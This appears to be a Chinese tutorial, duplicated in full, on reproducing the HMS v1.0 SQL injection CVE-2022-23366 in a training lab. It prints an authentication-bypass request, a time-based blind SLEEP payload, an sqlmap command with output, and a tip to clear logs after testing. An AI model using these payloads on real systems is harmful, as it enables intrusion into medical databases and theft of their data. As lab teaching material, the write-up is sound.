实战演练从零复现HMS v1.0的SQL注入漏洞CVE-2022-23366在网络安全领域SQL注入始终是最常见且危害性极高的漏洞类型之一。CVE-2022-23366作为HMS医院管理系统中的一个典型SQL注入漏洞为我们提供了绝佳的学习案例。本文将带领读者在i春秋靶场环境中从环境搭建到漏洞利用完整复现这一漏洞的发现与验证过程。1. 环境准备与靶场搭建1.1 了解HMS系统及其漏洞背景HMSHospital Management System是一款用于医疗机构日常管理的开源系统。CVE-2022-23366影响的是该系统的1.0版本漏洞存在于doctorlogin.php页面中。攻击者可以通过构造特殊的SQL语句绕过身份验证或获取数据库敏感信息。1.2 i春秋靶场环境配置i春秋平台提供了现成的漏洞复现环境免去了本地搭建的繁琐步骤访问i春秋官网并登录账号搜索CVE-2022-23366或直接访问提供的靶场链接点击开始实验按钮启动靶场环境注意部分靶场可能需要消耗积分或开通会员才能使用建议提前准备好账号权限。2. 漏洞定位与初步验证2.1 识别潜在注入点启动靶场后按照以下步骤操作在系统首页点击LOG IN按钮选择Doctor登录入口观察URL变化确认访问的是doctorlogin.php页面2.2 手工测试注入可能性在登录页面我们可以尝试基本的SQL注入测试POST /doctorlogin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded loginidadmin-- password123submitLogin如果系统返回异常或直接登录成功则基本确认存在SQL注入漏洞。3. 深入利用时间盲注技术3.1 理解时间盲注原理当系统不直接返回数据库错误信息时时间盲注Time-based Blind SQLi成为有效的探测手段。其核心是通过构造特定的SQL语句根据服务器响应时间判断条件真假。3.2 构造时间盲注Payload以下是针对该漏洞的有效时间盲注Payloadloginid123 AND (SELECT 5562 FROM (SELECT(SLEEP(5)))omHf) AND iRQSiRQSpassword123submitLogin这个Payload的工作原理如果注入成功服务器会执行SLEEP(5)函数导致响应延迟约5秒如果注入失败服务器会立即返回响应4. 自动化验证使用SQLMap工具4.1 准备请求文件将Burp Suite捕获的登录请求保存为request.txt文件POST /doctorlogin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 38 loginidtestpasswordtestsubmitLogin4.2 运行SQLMap进行自动化检测使用以下命令启动SQLMap扫描sqlmap -r request.txt --current-db --batch关键参数说明-r指定包含HTTP请求的文件--current-db获取当前数据库名称--batch自动选择默认选项无需交互4.3 结果分析与数据提取成功利用后SQLMap将返回类似以下信息[12:34:56] [INFO] the back-end DBMS is MySQL [12:34:57] [INFO] fetching current database current database: hms_db5. 防御建议与实战经验分享在实际渗透测试中遇到类似漏洞时需要注意权限控制确保测试行为在授权范围内进行数据备份操作前建议备份靶场环境日志清理测试完成后清除产生的日志记录对于开发人员防范SQL注入的最佳实践包括使用参数化查询Prepared Statements实施严格的输入验证配置适当的数据库权限定期进行安全审计和代码审查在最近的一次内部测试中我们发现类似医疗系统往往因为开发周期紧张而忽视基础安全措施。建议开发团队将安全测试纳入持续集成流程从源头杜绝此类漏洞。
手把手复现CVE-2022-23366:在i春秋靶场实战HMS v1.0的SQL注入漏洞
发布时间:2026/5/30 9:55:59
实战演练从零复现HMS v1.0的SQL注入漏洞CVE-2022-23366在网络安全领域SQL注入始终是最常见且危害性极高的漏洞类型之一。CVE-2022-23366作为HMS医院管理系统中的一个典型SQL注入漏洞为我们提供了绝佳的学习案例。本文将带领读者在i春秋靶场环境中从环境搭建到漏洞利用完整复现这一漏洞的发现与验证过程。1. 环境准备与靶场搭建1.1 了解HMS系统及其漏洞背景HMSHospital Management System是一款用于医疗机构日常管理的开源系统。CVE-2022-23366影响的是该系统的1.0版本漏洞存在于doctorlogin.php页面中。攻击者可以通过构造特殊的SQL语句绕过身份验证或获取数据库敏感信息。1.2 i春秋靶场环境配置i春秋平台提供了现成的漏洞复现环境免去了本地搭建的繁琐步骤访问i春秋官网并登录账号搜索CVE-2022-23366或直接访问提供的靶场链接点击开始实验按钮启动靶场环境注意部分靶场可能需要消耗积分或开通会员才能使用建议提前准备好账号权限。2. 漏洞定位与初步验证2.1 识别潜在注入点启动靶场后按照以下步骤操作在系统首页点击LOG IN按钮选择Doctor登录入口观察URL变化确认访问的是doctorlogin.php页面2.2 手工测试注入可能性在登录页面我们可以尝试基本的SQL注入测试POST /doctorlogin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded loginidadmin-- password123submitLogin如果系统返回异常或直接登录成功则基本确认存在SQL注入漏洞。3. 深入利用时间盲注技术3.1 理解时间盲注原理当系统不直接返回数据库错误信息时时间盲注Time-based Blind SQLi成为有效的探测手段。其核心是通过构造特定的SQL语句根据服务器响应时间判断条件真假。3.2 构造时间盲注Payload以下是针对该漏洞的有效时间盲注Payloadloginid123 AND (SELECT 5562 FROM (SELECT(SLEEP(5)))omHf) AND iRQSiRQSpassword123submitLogin这个Payload的工作原理如果注入成功服务器会执行SLEEP(5)函数导致响应延迟约5秒如果注入失败服务器会立即返回响应4. 自动化验证使用SQLMap工具4.1 准备请求文件将Burp Suite捕获的登录请求保存为request.txt文件POST /doctorlogin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 38 loginidtestpasswordtestsubmitLogin4.2 运行SQLMap进行自动化检测使用以下命令启动SQLMap扫描sqlmap -r request.txt --current-db --batch关键参数说明-r指定包含HTTP请求的文件--current-db获取当前数据库名称--batch自动选择默认选项无需交互4.3 结果分析与数据提取成功利用后SQLMap将返回类似以下信息[12:34:56] [INFO] the back-end DBMS is MySQL [12:34:57] [INFO] fetching current database current database: hms_db5. 防御建议与实战经验分享在实际渗透测试中遇到类似漏洞时需要注意权限控制确保测试行为在授权范围内进行数据备份操作前建议备份靶场环境日志清理测试完成后清除产生的日志记录对于开发人员防范SQL注入的最佳实践包括使用参数化查询Prepared Statements实施严格的输入验证配置适当的数据库权限定期进行安全审计和代码审查在最近的一次内部测试中我们发现类似医疗系统往往因为开发周期紧张而忽视基础安全措施。建议开发团队将安全测试纳入持续集成流程从源头杜绝此类漏洞。
:测试如何提前在代码提交阶段发现 Bug?)
)
